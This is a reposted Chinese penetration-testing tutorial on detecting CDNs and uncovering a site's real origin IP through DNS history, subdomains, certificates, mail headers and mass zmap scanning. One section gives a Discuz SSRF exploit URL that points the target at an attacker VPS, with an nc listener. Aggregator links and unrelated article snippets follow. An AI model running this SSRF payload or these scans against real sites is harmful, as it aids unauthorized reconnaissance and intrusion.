渗透测试中真实IP

发现了一篇两年前的好文章,转载给大家看看,方便自己以后查阅。

CDN简介

CDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点 服务器 所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。

CDN的目的是使用户可就近取得所需内容,解决Internet网络拥挤的状况,提高用户访问网站的响应速度。

1、nslookup

Windows下使用nslookup命令进行查询,若返回域名解析结果为多个ip,多半使用了CDN,不是真实的ip。

2、多地ping查询

使用多地ping服务,查看对应IP地址是否唯一,如果不唯一多半是使用了CDN。

多地ping网站:

多个地点Ping服务器,网站测速 - 站长工具

网站测速工具_超级ping _多地点ping检测 - 爱站网

http://ce.cloud.360.cn/

https://asm.ca.com/en/ping.php

3、 工具 查询

使用各种工具帮助检测目标网站是否使用了CDN,这里工具只能作为辅助,有一定误报的概率,只能作为参考。

查询工具:

CDN Finder - CDN Planet

IP查询_专业的 IP 地址库_IPIP.NET

绕过CDN查找真实ip

1、查询历史DNS记录

一般网站从部署开始到使用cdn都有一个过程,周期如果较长的话 则可以通过这类 历史解析记录查询等方式获取源站ip,查看IP与域名绑定的历史记录,可能会存在使用CDN前的记录。

DNSDB

https://www.virustotal.com /

微步在线X情报社区-威胁情报查询_威胁分析平台_开放社区

ViewDNS.info - Your one source for DNS related tools!

http://www.17ce.com/

http://toolbar.netcraft.com/site_report?url=

http://site.ip138.com/

https://securitytrails.com /

https://tools.ipip.net/cdn.php

下图可以清晰的看到sangfor社区用的是网宿的CND加速

2、子域名

鉴于CND的价格,很多站长可能只会对主站或者流量大的子站点做了CDN,很多较小站子站点又跟主站在同一台服务器或者同一个C段内,此时就可以通过查询子域名对应的IP 来辅助查找网站的真实IP。

收集工具

wydomain:https://github.com/ring04h/wydomain

subDomainsBrute:https://github.com/lijiejie/

Sublist3r:https://github.com/aboul3la/Sublist3r

layer子域名挖掘机

在线收集

https://dnsdb.io/zh-cn/

https://phpinfo.me/bing.php

http://www.webscan.cc

通过子域名挖掘机成功找到sangfor真实IP。

3、网络空间搜索引擎

常见的有钟馗之眼,shodan,fofa搜索。以fofa为例,只需输入:title:“网站的title关键字”或者body: “网站的body特征”就可以找出fofa收录的有这些关键字的ip域名,很多时候能获取网站的真实ip。

4、SMTP发送邮件

很多站点都有发送邮件的功能,如Rss邮件订阅、找回密码、邮箱注册等。而且一般的邮件系统很多都是在内部,没有经过CDN的解析。可以通过邮件源码寻找服务器的真实IP。

5、网站漏洞

扫描目标web目录 获取phpinfo探针类文件 ,基本上都存有服务器真实ip信息泄露。

在phpinfo里真实IP对应项为 :

SSRF漏洞,服务器主动向外发起连接,找到真实IP地址

如DZ SSRF漏洞,寻找真实IP的exp为:

http://域名/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://13.250.114.92:3319/aq9w.jpg[/img]

开启VPS端口监听 nc -lvp 3319 发现服务器访问VPS,即可找到真实IP地址。

6、国外请求

通过国外得一些冷门得DNS或IP去请求目标,很多时候国内得CDN对国外得覆盖面并不是很广,故此可以利用此特点进行探测。通过国外代理访问就能查看真实IP了,或者通过国外的DNS解析,可能就能得到真实的IP。

全世界DNS地址:http://www.ab173.com/dns/dns_world.php

7、SSL证书

假如在www.wangsu.com上托管了一个服务,原始服务器IP是136.23.63.44,而wangsu会为你提供DDoS保护,Web应用程序防火墙等服务,以保护你的服务免受攻击。为此,你的Web服务器就必须支持SSL并具有证书。

Censys工具就能实现对整个互联网的扫描,Censys是一款用以搜索联网设备信息的新型搜索引擎,能够扫描整个互联网,Censys会将互联网所有的ip进行扫面和连接,以及证书探测。若目标站点有https证书,并且默认虚拟主机配了https证书,我们就可以找所有目标站点是该https证书的站点。

https://censys.io/ipv4

这里sangfor社区使用了SSL证书,censys成功查找到真实IP。

8、全网扫描

获取CN的IP http://www.ipdeny.com/ipblocks/data/countries/cn.zone, 使用zmap对全CN IP的80端口进行扫描。

root@kali:~# zmap -p 80 -w bbs.txt -o 80.txt

设置http-req,将其设置为如下的值:

GET / HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:66.0) Gecko/20100101 Firefox/66.0

Host: %s

使用zmap的banner-grab对扫描出来80端口开放的主机进行banner抓取。

root@kali:~/zmap-1.2.1/examples/banner-grab# cat /root/bbs.txt |./banner-grab-tcp -p 80 -c 100 -d http-req -f ascii > http-banners.out

根据网站返回包特征,进行特征过滤location: plugin.php?id=info:index,找到数据包中包含sangfor社区相关特征。

以上就是本文的全部内容,希望对大家的学习有所帮助



本文来源:码农网
本文链接:https://www.codercto.com/a/75696.html

ip反查域名:

ip地址域名反解析,ip地址反查,ip反查域名_ip.yqie.comIP地址查询网:为您提供ip查询,ip解析,ip反查域名,ip地址,ip地址反查,域名ip定位,网吧ip定位,ip地址查询,通过地理位置查询IP地址,ip地址域名反解析http://ip.yqie.com/iptodomain.aspx?ip=ip地址查询 ip查询 查ip 公网ip地址归属地查询 网站ip查询 同ip网站查询 iP反查域名 iP查域名 同ip域名icon-default.png?t=M276https://site.ip138.com/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/1620566.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

常见的安全测试漏洞

一、SQL注入攻击 SQL 注入攻击主要是由于程序员在开发过程中没有对客户端所传输到服务器端的参数进行严格的安全检查,同时 SQL 语句的执行引用了该参数,并且 SQL 语句采用字符串拼接的方式执行时,攻击者将可能在参数中插入恶意的 SQL 查询语…

检测到目标URL存在http host头攻击漏洞,修复方案:在Web服务器防止Host头攻击

一、前言 漏洞描述:为了方便的获得网站域名,开发人员一般依赖于HTTP Host header。例如,在php里用_SERVER[“HTTP_HOST”]。但是这个header是不可信赖的,如果应用程序没有对host header值进行处理,就有可能造成恶意代…

一次简单的渗透测试,快来测测P站有没有漏洞吧!

前言 下午闲来无事,拿自己站玩玩,也算是一次比较完备地漏洞挖掘。文末插入福利 信息搜集 在fofa上找到一个后台的站。 一个普通的后台,弱口令,sql注入没打进去。 从错误路由中得知框架是tp的 这个版本是存在RCE漏洞的 直接嗦…

Git企业开发控制理论和实操-从入门到深入(五)|标签管理

前言 那么这里博主先安利一些干货满满的专栏了! 首先是博主的高质量博客的汇总,这个专栏里面的博客,都是博主最最用心写的一部分,干货满满,希望对大家有帮助。 高质量博客汇总 然后就是博主最近最花时间的一个专栏…

如何使用腾讯云服务器搭建网站?

使用腾讯云服务器搭建网站全流程,包括轻量应用服务器和云服务器CVM建站教程,轻量可以使用应用镜像一键建站,云服务器CVM可以通过安装宝塔面板的方式来搭建网站,腾讯云服务器网分享使用腾讯云服务器建站教程,新手站长搭…

iOS swift5 扫描二维码

文章目录 1.生成二维码图片2.扫描二维码(含上下扫描动画)2.1 记得在info.plist中添加相机权限描述 1.生成二维码图片 import UIKit import CoreImagefunc generateQRCode(from string: String) -> UIImage? {let data string.data(using: String.En…

使用windeployqt和InstallShield打包发布Qt软件的流程

前言 Qt编译之后需要打包发布,并且发布给用户后需要增加一个安装软件,通过安装软件可以实现Qt软件的安装;用于安装软件的软件有很多,这里主要介绍InstallShield使用的流程; 使用windeployqt打包Qt编译后的程序 Qt程序…

【论文笔记】最近看的时空数据挖掘综述整理8.27

Deep Learning for Spatio-Temporal Data Mining: A Survey 被引用次数:392 [Submitted on 11 Jun 2019 (v1), last revised 24 Jun 2019 (this version, v2)] 主要内容: 该论文是一篇关于深度学习在时空数据挖掘中的应用的综述。论文首先介绍了时空数…

有了二建证,对工资有多大提升?华通教育双十二建造师课程优惠来袭!

一开始每个月多1500工资, 现在算,差不多一个月多4000工资。 给大家分享一下考证之后带来的收益。文中妹子,刚毕业1500多的实习工资,考证后4000。 二建呢,其实它的作用是让你有机会进入工程行业,算是一块敲…

亿华通冲刺港股:年营收超6亿 业绩受申龙客车和中植汽车拖累

雷递网 雷建平 1月31日报道 北京亿华通科技股份有限公司(简称:“亿华通”)日前递交招股书,准备在香港上市。 亿华通是2020年8月在科创板上市,发行价为76.65元,发行17,630,523股,募集资金13.5亿元…

哈焊华通深交所上市:市值43亿 机械总院集团为大股东

雷递网 雷建平 3月22日报道 焊所华通(常州)焊业股份有限公司(简称:“哈焊华通”,证券代码:301137)今日在深交所上市。 哈焊华通本次发行4545.34万股,发行价为15.37元,募资…

世纪华通2020年业绩持续领先:商业模式愈发成熟,优秀质地突出

撰稿 | 多客 来源 | 贝多财经 过去一年,"宅经济"效应持续发酵,不仅让游戏公司的营收大幅度提升,也让众多资本开始青睐一些优质游戏公司的标的。 根InvestGame透露,游戏业2021年第一季度的并购交易和投融资金额就已经超…

第二届828 B2B企业节启动,华为云携手上万伙伴共筑企业应用一站购平台

当前,数字技术与实体经济深度融合,为千行百业注入新动力、拓展新空间。数据显示,2022年中国数字经济规模超过50万亿,占GDP比重超过40%,继续保持在10%的高位增长速度,成为稳定经济增长的关键动力。 为加速企…

[杂谈]10年前的杂志文章-清凉简装,电脑减负非诚勿扰

《清凉简装 电脑减负非诚勿扰》-这是《电脑爱好者》2010年14期的封面文章,也是我在各个平台昵称的由来,当年那本杂志早就卖废纸了。知网找到了原文,重温一下,十年弹指一挥间,当年的顶配机型现在看个B站估计都够呛&…

周易卦爻解读笔记——井卦

第四十八卦井 水风井 坎上巽下 井卦由泰卦所变,泰卦六五与初九换位,象征建设民生。 地天泰 井卦是困卦的覆卦,序卦传【困乎上者必反下,故受之以井】 井卦是改革三部曲第一卦,后面的革、鼎也都是言谈改革。 井&…

STM32的时钟系统

今天,学习了STM32的时钟系统,如下为stm32的时钟树。

淘沙河 - 清凉解暑之电风扇

如何正确选购电风扇 1.选购电风扇的第一维度:根据自身需求定位风扇类别 2.选购电风扇的第二维度:看电风扇核心部件:电机电风扇电机作为心脏部件最值得消费者重视,一台电风扇的电机寿命直接决定电风扇使用寿命,所以选择…

ChatGLM-6B的基座/部署/微调/实现:从GLM到6B的LoRA/P-Tuning微调、及6B源码解读

前言 随着『GPT4多模态/Microsoft 365 Copilot/Github Copilot X/ChatGPT插件』的推出,绝大部分公司的技术 产品 服务,以及绝大部分人的工作都将被革新一遍 类似iPhone的诞生 大家面向iOS编程 有了App Store现在有了ChatGPT插件/GPT应用商店&#xff…

大话设计模式-装饰模式

前言 穿衣打扮是现在的时尚潮流,我们时常刷淘宝来不断满足自己的打扮需求,买个帽子、换条裤子、整双时尚鞋。需求是没有极限的,无止境的购物,只要存在这个平台那么这些装饰性的购物是不可避免的。这在我们软件开发中可以看做是为我…

VS2015+MATLAB2016b混合编程

原 VS2015MATLAB2016b混合编程 2017年12月03日 20:11:46 Zlase 阅读数&#xff1a;1878 更多 <div class"tags-box space"><span class"label">个人分类&#xff1a;</span><a class"tag-link" href"https://blog.csd…